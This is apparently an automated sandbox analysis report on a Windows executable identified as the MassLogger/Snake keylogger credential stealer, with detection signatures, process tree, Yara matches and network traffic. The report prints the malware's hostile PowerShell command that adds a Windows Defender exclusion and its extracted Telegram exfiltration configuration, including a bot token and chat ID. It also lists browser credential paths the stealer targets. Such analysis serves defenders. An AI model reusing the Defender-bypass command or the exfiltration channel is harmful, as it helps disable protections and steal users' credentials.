
Windows Analysis Report
rPO2400525.exe

Overview

General Information

Sample name: rPO2400525.exe
Analysis ID: 1618720
MD5: 9393c3e2268fe4c15da55f0d5233245d
SHA1: ecc0ea51def475cd0facc10c5911c0546d6cd835
SHA256: 8ea6427ed08636f4220611662424cdf09103fecdb4ef6a0c15103c715364fbf3
Tags: exe, user-Porcupine

Detection

MassLogger RAT
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected MassLogger RAT
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

  • System is w10x64
  • rPO2400525.exe (PID: 6200 cmdline: "C:\Users\user\Desktop\rPO2400525.exe" MD5: 9393C3E2268FE4C15DA55F0D5233245D)
    • powershell.exe (PID: 6984 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7164 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • rPO2400525.exe (PID: 2380 cmdline: "C:\Users\user\Desktop\rPO2400525.exe" MD5: 9393C3E2268FE4C15DA55F0D5233245D)
  • cleanup

Malware Configuration

{"EXfil Mode": "Telegram", "Telegram Token": "7215906847:AAG2SKPaqtwpEVHnMRasOy3MDdNuuViSz-U", "Telegram Chatid": "1984300162"}

Yara Matches (memory dumps)

Source | Rule | Description | Author | Strings
00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0xf815:$a1: get_encryptedPassword
  • 0xfb3d:$a2: get_encryptedUsername
  • 0xf5a2:$a3: get_timePasswordChanged
  • 0xf6c3:$a4: get_passwordField
  • 0xf82b:$a5: set_encryptedPassword
  • 0x11189:$a7: get_logins
  • 0x10e3a:$a8: GetOutlookPasswords
  • 0x10c2c:$a9: StartKeylogger
  • 0x110d9:$a10: KeyLoggerEventArgs
  • 0x10c89:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
(8 further entries not shown)

Yara Matches (unpacked PEs)

Source | Rule | Description | Author | Strings
0.2.rPO2400525.exe.3650f90.4.unpack | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
0.2.rPO2400525.exe.3650f90.4.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
0.2.rPO2400525.exe.3650f90.4.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0xdc15:$a1: get_encryptedPassword
  • 0xdf3d:$a2: get_encryptedUsername
  • 0xd9a2:$a3: get_timePasswordChanged
  • 0xdac3:$a4: get_passwordField
  • 0xdc2b:$a5: set_encryptedPassword
  • 0xf589:$a7: get_logins
  • 0xf23a:$a8: GetOutlookPasswords
  • 0xf02c:$a9: StartKeylogger
  • 0xf4d9:$a10: KeyLoggerEventArgs
  • 0xf089:$a11: KeyLoggerEventArgsEventHandler
0.2.rPO2400525.exe.3650f90.4.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
  • 0x12d8d:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x1228b:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x12599:$a4: \Orbitum\User Data\Default\Login Data
  • 0x13391:$a5: \Kometa\User Data\Default\Login Data
5.2.rPO2400525.exe.400000.0.unpack | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
(15 further entries not shown)

                System Summary

Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rPO2400525.exe", ParentImage: C:\Users\user\Desktop\rPO2400525.exe, ParentProcessId: 6200, ParentProcessName: rPO2400525.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe", ProcessId: 6984, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rPO2400525.exe", ParentImage: C:\Users\user\Desktop\rPO2400525.exe, ParentProcessId: 6200, ParentProcessName: rPO2400525.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe", ProcessId: 6984, ProcessName: powershell.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rPO2400525.exe", ParentImage: C:\Users\user\Desktop\rPO2400525.exe, ParentProcessId: 6200, ParentProcessName: rPO2400525.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe", ProcessId: 6984, ProcessName: powershell.exe

Suricata IDS Alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-19T04:01:19.392226+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49706 | 193.122.130.0 | 80 | TCP


                AV Detection

Source: 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7215906847:AAG2SKPaqtwpEVHnMRasOy3MDdNuuViSz-U", "Telegram Chatid": "1984300162"}
Source: rPO2400525.exe Virustotal: Detection: 23%
Source: rPO2400525.exe ReversingLabs: Detection: 21%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.5% probability

                Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org
Source: rPO2400525.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49708 version: TLS 1.0
Source: rPO2400525.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 4x nop then jmp 01389731h 5_2_01389480
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 4x nop then jmp 01389E5Ah 5_2_01389A40
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 4x nop then jmp 01389E5Ah 5_2_01389A30
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 4x nop then jmp 01389E5Ah 5_2_01389D87
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 4x nop then jmp 058A8830h 5_2_058A8588
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 4x nop then jmp 058A47C9h 5_2_058A4520
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 4x nop then jmp 058A76D0h 5_2_058A7428
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 4x nop then jmp 058AF700h 5_2_058AF458
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 4x nop then jmp 058AE9F8h 5_2_058AE750
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 4x nop then jmp 058A5929h 5_2_058A5680
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 4x nop then jmp 058AE5A0h 5_2_058AE180
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 4x nop then jmp 058A83D8h 5_2_058A8130
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 4x nop then jmp 058AF2A8h 5_2_058AF000
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 4x nop then jmp 058A7278h 5_2_058A720E
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 4x nop then jmp 058A54D1h 5_2_058A5228
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 4x nop then jmp 058A5079h 5_2_058A4DD0
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 4x nop then jmp 058A7F80h 5_2_058A7CD8
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 4x nop then jmp 058A4C21h 5_2_058A4978
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 4x nop then jmp 058A7B28h 5_2_058A7880
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 4x nop then jmp 058AFB58h 5_2_058AF8B0
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 4x nop then jmp 058AEE50h 5_2_058AEBA8
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 4x nop then jmp 058A5E15h 5_2_058A5AD8
Source: global traffic HTTP traffic detected:
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 193.122.130.0
Source: Joe Sandbox View IP Address: 104.21.64.1
Source: Joe Sandbox View IP Address: 104.21.64.1
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49706 -> 193.122.130.0:80
Source: global traffic HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49708 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected:
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: rPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.com
Source: rPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.comd
Source: rPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3323697493.0000000002D43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: rPO2400525.exe, 00000005.00000002.3323697493.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: rPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/d
Source: rPO2400525.exe, 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: rPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.orgd
Source: rPO2400525.exe, 00000005.00000002.3323697493.0000000002D6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://reallyfreegeoip.org
Source: rPO2400525.exe, 00000005.00000002.3323697493.0000000002D6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://reallyfreegeoip.orgd
Source: rPO2400525.exe, 00000000.00000002.2084107935.00000000027EF000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3323697493.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rPO2400525.exe, 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: rPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: rPO2400525.exe, 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: rPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
Source: rPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708

                Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.rPO2400525.exe.3639970.1.raw.unpack, UltraSpeed.cs .Net Code: VKCodeToUnicode
Source: 0.2.rPO2400525.exe.3650f90.4.raw.unpack, UltraSpeed.cs .Net Code: VKCodeToUnicode

                System Summary

Source: 0.2.rPO2400525.exe.3650f90.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.rPO2400525.exe.3650f90.4.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.rPO2400525.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.rPO2400525.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.rPO2400525.exe.3639970.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.rPO2400525.exe.3639970.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.rPO2400525.exe.3650f90.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.rPO2400525.exe.3650f90.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.rPO2400525.exe.3639970.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.rPO2400525.exe.3639970.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: rPO2400525.exe PID: 6200, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: rPO2400525.exe PID: 2380, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 0_2_009EDA5C
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_0138C530
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_013827B9
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_01382DD1
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_01389480
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_0138C4AA
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_0138946F
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A6138
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058ABC60
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058AAF00
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A89E0
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A8588
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A450F
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A4520
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A8579
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A7418
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A7428
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058AF448
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058AF458
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058AE740
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058AE750
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A5680
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058AE180
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A612A
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A8120
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A8130
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058AF000
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A13A8
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A0320
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A0330
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A521A
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A5228
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A4DC0
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A4DD0
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A7CC8
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A0CD8
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A7CD8
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A6FC3
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A6FD0
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058AEFF0
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A89D0
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A4969
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A4978
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A7880
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058AF8A1
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058AF8B0
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A7871
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058AEB98
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058AEBA8
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A0AB8
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A5ACA
Source: C:\Users\user\Desktop\rPO2400525.exe Code function: 5_2_058A5AD8
Source: rPO2400525.exe, 00000000.00000002.2083171797.0000000000A1E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs rPO2400525.exe
Source: rPO2400525.exe, 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCloudServices.exe< vs rPO2400525.exe
Source: rPO2400525.exe, 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCaptive.dll" vs rPO2400525.exe
Source: rPO2400525.exe, 00000000.00000000.2069830343.0000000000242000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameRjYY.exeH vs rPO2400525.exe
Source: rPO2400525.exe, 00000000.00000002.2101219919.0000000006B00000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs rPO2400525.exe
Source: rPO2400525.exe, 00000000.00000002.2084107935.00000000027EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCloudServices.exe< vs rPO2400525.exe
Source: rPO2400525.exe, 00000000.00000002.2096199828.0000000003E8F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs rPO2400525.exe
Source: rPO2400525.exe, 00000000.00000002.2099989799.0000000005060000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameCaptive.dll" vs rPO2400525.exe
Source: rPO2400525.exe, 00000005.00000002.3322178441.0000000000BD7000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs rPO2400525.exe
Source: rPO2400525.exe, 00000005.00000002.3321986255.000000000041A000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCloudServices.exe< vs rPO2400525.exe
Source: rPO2400525.exe Binary or memory string: OriginalFilenameRjYY.exeH vs rPO2400525.exe
Source: rPO2400525.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.rPO2400525.exe.3650f90.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.rPO2400525.exe.3650f90.4.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.rPO2400525.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.rPO2400525.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.rPO2400525.exe.3639970.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.rPO2400525.exe.3639970.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.rPO2400525.exe.3650f90.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
